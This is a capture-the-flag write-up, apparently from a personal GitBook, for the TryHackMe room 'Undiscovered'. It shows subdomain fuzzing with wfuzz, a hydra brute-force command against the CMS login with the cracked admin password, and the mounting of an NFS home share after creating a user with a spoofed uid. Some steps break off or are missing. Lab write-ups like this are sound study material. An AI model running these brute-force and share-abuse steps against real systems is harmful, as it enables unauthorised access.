GeorgeBanu
  • About me
  • Pentesting CheatSheets
    • Information Gathering
    • Ports Enumeration
      • FTP-21
      • SSH-22
      • Telnet-23
      • SMTP - 25,465,587
      • DNS-53
      • NetBIOS, SMB - 139,445
      • SNMP-161
      • MySQL-3306
      • RDP-3389
      • WinRM-5985
    • Web Cheat Sheet
    • Privilege Escalation
      • Linux Enumeration
      • Linux Privesc Techniques
    • Tricks
    • Template
  • TryHackMe Writeups
    • Starter
    • Dreaming
    • ColddBox: Easy
    • Ollie
    • Blog
    • KoTH Hackers
    • Brooklyn Nine Nine
    • Chill Hack
    • Undiscovered
    • Archangel
    • Jason
    • GLITCH
    • VulnNet: Node
    • Road
    • VulnNet:Internal
    • W1seGuy
  • CyberEDU Writeups
    • flag-is-hidden
    • file-crawler
    • reccon
    • this-file-hides-something
    • wifiland
    • old-tickets
    • inodat
    • pattern
    • ultra-crawl
  • eJPT
Powered by GitBook
On this page
  • Lab Setup
  • Enumeration
  1. TryHackMe Writeups

Undiscovered

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/Undiscovered
cd ~/Documents/TryHackMe/eJPT/Undiscovered
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}

export IP=10.10.56.55
export URL=http://$IP
export domain=undiscovered.thm

Enumeration

First we need to add the domain in the /etc/hosts file to get access to the website. I usually do a subdomain scan after I get a domain using wfuzz or gobuster , I prefer wfuzz because are faster than gobuster.

wfuzz -c -f enumeration/subdomains.txt -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hl 7 -t 200 -u "http://$IP" -H "Host: FUZZ.$domain"

I found a lot of subdomains. After some minutes of enumeration I see that deliver subdomain are different from the others, so I begin with it.

cat enumeration/subdomains.txt| awk '{print $5,$9}'| uniq | sort
341 "booking"
341 "dashboard"
341 "deliver"
341 "develop"
341 "forms"
341 "gold"
341 "internet"
341 "mailgate"
341 "maintenance"
341 "manager"
341 "network"
341 "newsite"
341 "play"
341 "resources"
341 "start"
341 "terminal"
341 "view"

When I have to enumerate a website I start with fuzzing using feroxbuster and dirsearch.

After a long time I use hydra to brute force the admin user password.

hydra -l admin -P ~/Documents/rockyou.txt deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong" -f

admin:liverpool

I also find an interesting script to exploit this CMS version.

After some minutes of enumeration I got stuck, so I go back to open ports and there’re NFS share folders, but I cannot access. Verify /etc/exports to see which folder are shared.

So folder /home/william is shared and can be accessed. Let’s see his uid and gid:

william:x:3003:3003::/home/william:/bin/bash

It’s 3003. Create a user “william” on your machine with the same uid and gid, and mount the folder to see what’s inside.

# Execute this command into your attacking machine 
sudo useradd -u 3003 william
sudo mount -t nfs 10.10.126.209:/home/william /home/william
sudo usermod --shell /bin/bash william
sudo -u william -i

Found the user flag and another useful files.

Now let’s login with the id_rsa key.

After minutes of enumeration I found how to get root privilege. See the capabilities.

PreviousChill HackNextArchangel

Last updated 1 year ago

Ok, so if I execute script without argument, it will exec . But if I provide with argument, I can read this argument(strcat) as leonard priv.

admin.sh